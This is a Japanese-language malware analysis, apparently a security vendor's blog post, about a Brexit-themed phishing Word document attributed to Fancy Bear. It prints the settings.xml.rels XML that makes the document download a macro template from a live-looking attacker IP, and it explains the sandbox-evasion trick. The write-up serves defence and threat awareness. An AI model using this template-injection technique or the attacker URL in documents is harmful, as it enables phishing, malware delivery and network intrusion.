最近、Office の不正文書が添付された、イギリスの EU 離脱関連のメールを何人かのユーザが受け取っていたことがわかりました。ファイルの名前が Brexit 15.11.2018.docx であり、イギリスの EU 離脱の計画の発表と同時期にメールが出回ったことから、この文書の作成者がニュースをよく見ていることは間違いないでしょう。添付ファイルのメタデータによると、この文書の作成者は「Johnne」です。また、ファイルのメタデータには、Grizli777 という名前も確認されましたが、これは、Microsoft Office ソフトウェアの海賊版を作成しているとされている集団であり、上記の作成者の名前をこの集団が使うこともわかっています。ロシア政府が支援しているとされるハッカー集団「Fancy Bear」がこの海賊版ソフトウェアとこの作成者名の組み合わせを使ったことがあることから、今回もその亜種であると考えられます。

配信されたメールのコピーを手に入れることはできませんでしたが、このマルウェアのサンプルを手に入れ、分析することができました。この文書には分析を回避する仕組みが組み込まれていましたが、我々独自の方法によって分析に成功し、以下のことがわかりました。

この文書は、DNS 検索を使わずに、ラトビアの IP アドレスと直接やり取りしようとします。文書から外部のソースへのやり取りは、どのようなものでも怪しいものですが、ドメイン名ではなく、IP を使っているとなると、さらに疑惑が深まります。我々の分析でこれらの接続が失敗したということは、サーバが特定のソース IP アドレスを見つけられなかったか、攻撃者側がすでにダウンしているかのいずれかであることを意味します。

そこで、109.248.148.42 という IP に注目しました。この IP の DNS レコードは存在しないため、ドメイン名の登録に必要であるはずの多くの追加データを手に入れることはできません。この IP アドレスの現在の持ち主は、仮想サーバを提供している、ラトビアの ISP です。我々は、ここで攻撃者がホスティングされているか、少なくとも C&C（コマンドアンドコントロール）サーバがルーティングされているのではないかと考えました。

サンドボックスでこの文書を開くことで、ファイルの中身を安全に観察することができます。文書の先頭に、この種のマルウェアでよく使われるソーシャルエンジニアリングのトリックである、マクロを許可する通知が含まれていました。さらには、マクロを正しく表示するために必要なものと思わせるような、何らかの意味がありそうなランダムな文字も含まれていますが、これは単にこの文書でのマクロの実行をユーザに許可させるようにするためのものと思われます。この文書そのものにはマクロは見つからず、この文書がインターネットからダウンロードする外部テンプレートにマクロが含まれていることがわかりました。具体的には、前述のラトビアの IP アドレスからこのテンプレートがダウンロードされます。このような回避方法は、それほど一般的なものではありません。

docx アーカイブを解凍したところ、この文書によって外部ソースからテンプレートがロードされることがわかりました。そして、ファイル settings.xml.rels に次のような記述が見つかりました。

<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>

<Relationships  
	xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”>
<Relationship Id=”rId1″ 
	Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” 
	Target=”http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm” 
	TargetMode=”External”/>
</Relationships/>

Office 文書はこのような XML を使用して、メタデータ、テンプレート、およびコンテンツのスタイルを保存します。この例の XML の場合は、そのような一般的な用途だけにとどまらず、この文書が使用する外部テンプレートの場所が記述されています。

http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm

残念ながらサーバがダウンしていたため、我々の分析でマクロそのものを調査することはできませんでしたが、OLE ダウンローダであることが確認されました。

このマルウェアは、文書をユーザが実行した後にダウンローダマクロを取得するという、珍しいものであり、ほとんどの場合、マクロのコンテンツは元の文書に含まれています。

このような方法はフィッシング攻撃でよく使われます。このファイルを実際に開いてマクロを実行したユーザがいるのかどうかはわかりませんが、ユーザのネットワークへのハッカー集団の侵入方法を示しているのは確かであり、このアプローチが使われる例が今後は増えるものと予想されます。このような攻撃がシグネチャベースの従来型ウイルス対策ソフトウェアに対して極めて有効であるのは、ユーザが文書を開いてテンプレートがダウンロードされるまで不正コードがダウンロードされないためです。高度なサンドボックス型のマルウェア対策サービスであれば、ファイルを開き、外部からのテンプレートのロードを含むすべての挙動を検査するため、このような脅威を特定する有効な手段となります。この種の攻撃を防ぐため、送信元を知っていて、その送信元からの文書であることがわかっているのでない限り、文書に含まれるマクロを実行するべきではありません。